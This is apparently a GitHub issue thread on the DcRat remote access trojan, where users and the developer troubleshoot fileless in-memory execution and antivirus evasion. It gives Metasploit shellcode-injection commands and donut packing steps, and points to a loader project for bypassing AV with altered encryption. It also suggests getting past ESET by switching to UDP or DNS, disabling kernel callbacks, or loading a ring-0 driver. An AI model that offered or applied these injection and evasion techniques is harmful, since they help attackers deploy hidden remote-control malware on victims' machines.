Closed qwer0123456 closed 3 years ago
I've tried donut; the problem may be caused by the unsafe code.
https://github.com/qwqdanchun/DcRat/blob/main/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/UnsafeCodecs/UnsafeStreamCodec.cs
You will find some native code in remotedesktop.dll.
Maybe look at this project: https://github.com/qwqdanchun/Bypass. It shows how to code a loader to bypass AV. Change the way of encryption, and enjoy it.
Unsafe code -> is it impossible to convert it to safe code?
Can't fix it in UnsafeStreamCodec.cs?
The fileless technique I tested is:
Compile it with donut and run the commands below.
Metasploit commands:

```
use post/windows/manage/shellcode_inject
set AUTOUNHOOK false
set CHANNELIZED false
set INTERACTIVE false
set pid 0
set shellcode /root/payload.bin
set session 1 (number)
run
```
In the case of Quasar remote, viewing the screen is possible.
There seems to be something different.
Sorry for what I said before. I made a payload.bin with donut and tested it with a C# loader and a C++ loader just now. Both work well, so it may not be because of the unsafe code.
I don't have msf on my PC, so I can't test the shellcode_inject module. Have you ever tried any shellcode loader?
You don't have to use Metasploit.
You can also create a thread after copying the donut-compressed program into memory.
Something that can be said for sure:
Quasar remote viewing is possible.
I have no idea how to solve this problem.
Thanks for the help.
pid 0 runs notepad.exe -> memory injection into a new notepad process.
You can also specify the pid.
Try changing the pid.
I found that this article says "在注入进程时,发现注入到notepad.exe中无法执行,但注入到powershell中可以执行。" Translated: "When injecting into a process, it was found that injection into notepad.exe cannot execute, but injection into powershell can execute."
The process does not matter if the window session is the same.
explorer.exe, RuntimeBroker.exe, notepad.exe, etc. -> all impossible.
Remote viewing of Quasar is possible.
In UnsafeStreamCodec.cs, Quasar has several different parts.
I don't know why this is not possible from async remote.
Try powershell; maybe it's because of the CLR?
I can't find why it doesn't work.
Quasar source works fine.
This is the source with a try and some additions.
The screen is now displayed normally.
############################################################
https://www.eset.com/us/home/free-trial/
ESET antivirus detects it as MSIL/Agent.
ESET detects it unconditionally when connecting a TCP socket.
Do you know how to bypass ESET's TCP detection?
The screen output problem was solved lol
ClientSocket.cs (the connect loop where ESET fires):

```csharp
foreach (IPAddress theaddress in addresslist)
{
    try
    {
        TcpClient.Connect(theaddress, ServerPort); // tcp connect: ESET antivirus detects here
        if (TcpClient.Connected) break;
    }
    catch { }
}
```
Thank you for your code. I'll push it later.
If you'd like to bypass the TCP detection, you may change it to UDP or DNS and so on.
After installing ESET in a VM, I tested the RAT. It didn't detect the TCP connect. I don't know why. However, I was sad to find that many plugins may be detected. Maybe I should rewrite some plugins later.
Not detected as exe execution.
Memory area detection:
Copy the donut-packed program into memory and create a thread.
Connect TCP in the created thread.
The in-memory TCP connect is detected.
Normal exe execution is not detected.
The fileless technique bypasses 90% of antivirus.
I am curious if there is any new detection technique.
Thank you.
#############################################
Thanks for any hints on the screen viewing problem (unsafe code memory).
I don't know how to bypass ESET.
ESET's scan is powerful. Maybe it disables TCP connects from processes like notepad?
This is my guess.
Because it didn't detect the TCP connect when you just ran it as an exe.
https://github.com/BlackINT3/OpenArk/releases/tag/v1.1.0
ObRegisterCallbacks in the kernel.
If you disable the LoadImage kernel part to work with OpenArk,
it can't be detected.
It seems to be detected if the running thread's image address is not normal.
Create a thread, and it detects whether the image address value is abnormal!
Good work!
However, this is hard to bypass.
Usually you can't disable it in ring 3.
ESET seems like a good antivirus.
If you load a driver in ring 0 it will probably be bypassed easily.
To go from a normal user to system privilege, you must also escalate privileges and manipulate tokens.
Ring 3 seems to need an idea.
Thanks for the reply
Will the problem be solved?
localhost and 192.168.0.1~255 VMware connections are fine.
If you connect with an external IP, you cannot connect. (59.12.151.12, 39.128.121.11)
Analyzing the source a little more,
does it need more HWID and a specific user ID?
remotedesktop.dll does not connect to the new port,
but in the case of file search, a new port connection is possible.
The fileless technique is good.
If this is resolved, I am also willing to donate.
I don't know how to fix it.
If the issue is unrelated to the topic or cannot be fixed, please close the issue.
Thank you.